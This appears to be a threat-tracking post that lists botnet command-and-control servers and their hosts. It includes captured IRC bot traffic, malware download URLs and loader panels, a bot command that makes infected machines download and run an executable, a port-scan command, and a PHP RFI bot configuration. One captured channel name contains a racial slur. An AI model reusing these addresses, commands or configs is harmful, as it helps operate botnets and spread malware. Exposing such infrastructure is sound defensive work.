208.67.252.82(irc botnet hosted in United Kingdom Pelican Helpdesk Ltd)

Remote Host Port Number 208.67.252.82 2345 NICK New[USA|00|P|00209] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-4688 * 0 :COMPUTERNAME MODE New[USA|00|P|00209] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/208.67.252.82

tretr23.com(JACK LOADER hosted in Romania Iasi Prime Telecom Srl)

Another http malware spreading around Panel:http://188.247.135.32/signin.php Network Activity: Host Name IP Address tretr23.com tretr23.com 188.247.135.32 Download URLs http://188.247.135.32/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D07DB5860B2E69F2DCE5CA8B5FF9F6DADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5854372&v=2&t=0,4527399 (tretr23.com) Outgoing connection to remote server: tretr23.com TCP port 80 Host Name IP Address ytreytre.com ytreytre.com 94.63.240.235 Download URLs http://94.63.240.235/temp/3431.exe?t=0,4103815 (ytreytre.com) Outgoing connection to remote server: ytreytre.com TCP port 80 Host Name IP Address tretr23.com tretr23.com 188.247.135.32

negro001.com(ngrBot hosted in Seychelles Ideal Solution Ltd)

Resolved : [negro001.com] To [193.107.16.131] Resolved : [negro001.com] To [92.241.165.152] Remote Host Port Number 199.15.234.7 80 92.241.165.152 8782 ircd here 193.107.16.131 8782 ircd here NICK [USA|635435] USER 8770 “” “lol” :8770 JOIN #moo PONG :Threat-Expert.net NICK {iNF-00-USA-XP-COMP-7188} JOIN #hold nigger PONG Threat-Expert.net USER blaze * 0 :COMP hosting infos: http://whois.domaintools.com/193.107.16.131

208.67.252.118(irc botnet hosted in United States Buckshot Enterprises Llc)

Remote Host Port Number 208.67.252.118 2345 NICK [USA|00|P|65160] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-2443 * 0 :COMPUTERNAME MODE [USA|00|P|65160] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/208.67.252.118

www.facebookvideocentral.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

Remote Host Port Number 213.202.225.40 80 213.202.225.48 80 74.206.242.164 80 46.45.164.166 81 IRCD HERE NICK [N00_USA_XP_8072956] JOIN #c MODE [00_USA_XP_9406831] -ix USER SP2-351 * 0 :COMPUTERNAME PRIVMSG #bs :HTTP SET http://46.45.164.163/cc.exe PRIVMSG #c :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 15 threads. PRIVMSG #c :scan;

java.alb-team.com(linux bots hosted in United States Ft. Lee Righthosting.com)

albanian lamers hosting rfi bots for ddos var $config = array(“server”=>”java.alb-team.com”, “port”=>4242, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”#bote”, “key”=>”142536”, // “modes”=>”-x+i”, “password”=>”bomp”, // “trigger”=>”!say@”, “hostauth”=>”*” // * hosting infos: http://whois.domaintools.com/66.78.3.76

latincrew.biz(ngrBot hosted in Russian Federation Moscow Oao Webalta)

Resolved : [latincrew.biz] To [92.241.165.124] Other domains used to control bots: xsstorm.com 87.255.51.229 latincrew.biz 92.241.165.124 gu1d3sh3n.cz.cc 178.238.36.17 92.241.165.124 1234 PASS xxx NICK NEW-[USA|00|P|01507] USER XP-5713 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|01507] -ix JOIN #!nw! test PONG 22 MOTD exe file: Download Download UPDATE: 64.202.107.109 1234 Now talking in #!nw! Topic On: [ #!nw! ] [ .g.f